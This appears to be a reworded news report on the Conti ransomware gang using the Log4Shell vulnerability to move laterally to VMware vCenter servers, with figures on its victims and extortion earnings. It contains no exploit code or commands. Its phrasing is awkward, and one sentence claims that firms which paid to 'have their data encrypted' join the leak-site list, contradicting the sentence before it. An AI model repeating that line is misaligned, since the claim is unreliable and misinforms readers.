The Conti ransomware operation uses the crucial Log4Shell exploit to quickly acquire access to private VMware vCenter Server instances as well as encrypt virtual machines.
The gang wasted no time in adopting the new attack vector and it is the first “top-tier” campaign to militarise the Log4j flaw.
The Vulnerable vCenter Is In The Crosshairs
On December 9, a proof-of-concept (PoC) attack for CVE-2021-44228, also known as Log4Shell, was made public.
A day later, extensive internet scanning began, with several attackers searching for susceptible computers. Cryptocurrency miners, botnets, as well as a new ransomware outbreak named Khonsari, were the first to exploit the issue.
By December 15, the cyber criminals employing Log4Shell had grown to include state-backed hackers as well as initial access brokers, who often sell network access to ransomware organizations.
Conti, one of the largest and the most prolific ransomware groups today, apparently took an early interest in Log4Shell, recognizing it as a prospective attack vector on Sunday, December 12.
The gang began seeking additional victims the next day, with the objective of lateral movement to VMware vCenter networks, cybercrime, and hostile disruption, according to Advanced Intelligence (AdvIntel), which shared the information with BleepingComputer.
Dozens of companies have been impacted by Log4Shell and have hastened to repair their products or give consumers workarounds as well as mitigations. VMware is one among them, with 40 susceptible products on its list.
While the firm supplied mitigations or remedies, an update for the impacted vCenter versions is still to be released.
Although vCenter servers are not generally accessible to the open web, there are a few circumstances in which an attacker may make use of the flaw:
“A malicious actor with network access to an impacted VMware product may exploit this issue to gain full control of the target system and/or perform a denial of service attack” – Vmware
According to AdvIntel, Conti ransomware criminals expressed interest in exploiting the public exploit to use Log4Shell for their activities.
Log4Shell Going To Migrate Laterally
According to a source shared with BleepingComputer, “this is the first time this vulnerability entered the radar of a major ransomware group.”
“The current exploitation led to multiple use cases through which the Conti group tested the possibilities of utilizing the Log4J exploit” – AdvIntel
While most guards focus on preventing Log4Shell attacks on Internet-connected systems, the Conti ransomware campaign demonstrates how the flaw may be exploited to target internal systems that may not get as much focus.
Conti ransomware adherents had already entered the target networks and used weak Log4j workstations to obtain access to vCenter systems, according to the experts.
This suggests that Conti ransomware attackers used a different initial access vector (RDP, VPN, email phishing) to attack a network and are now moving laterally on the network using Log4Shell.
Conti, the famed Ryuk’s successor, is a Russian-speaking organization that’s been in the ransomware game for years.
The group is behind hundreds of attacks, with its data leak site alone identifying over 600 victim firms that did not pay a ransom. Other firms that paid the actor to have their data encrypted are added to this list.
According to Group-IB, around 30% of ransomware victims prefer to pay to retrieve their data using the hacker’s decryption software.
The Australian Cyber Security Centre (ACSC) recently issued a warning regarding Conti ransomware, which was attacking various companies in the country. CS Energy, an electricity provider, was one of the victims.
Conti also targeted Frontier Software, a payroll software provider utilized by the Australian government, exposing the personal information of thousands of government workers.
BleepingComputer just revealed that the gang targeted McMenamins, a brewery and hotel company in Oregon (Portland) as well as in Washington, U.S. Conti ransomware has been active under this moniker since June 2020. AdvIntel reports that the gang has extorted more than $150 million from its targets in the last six months.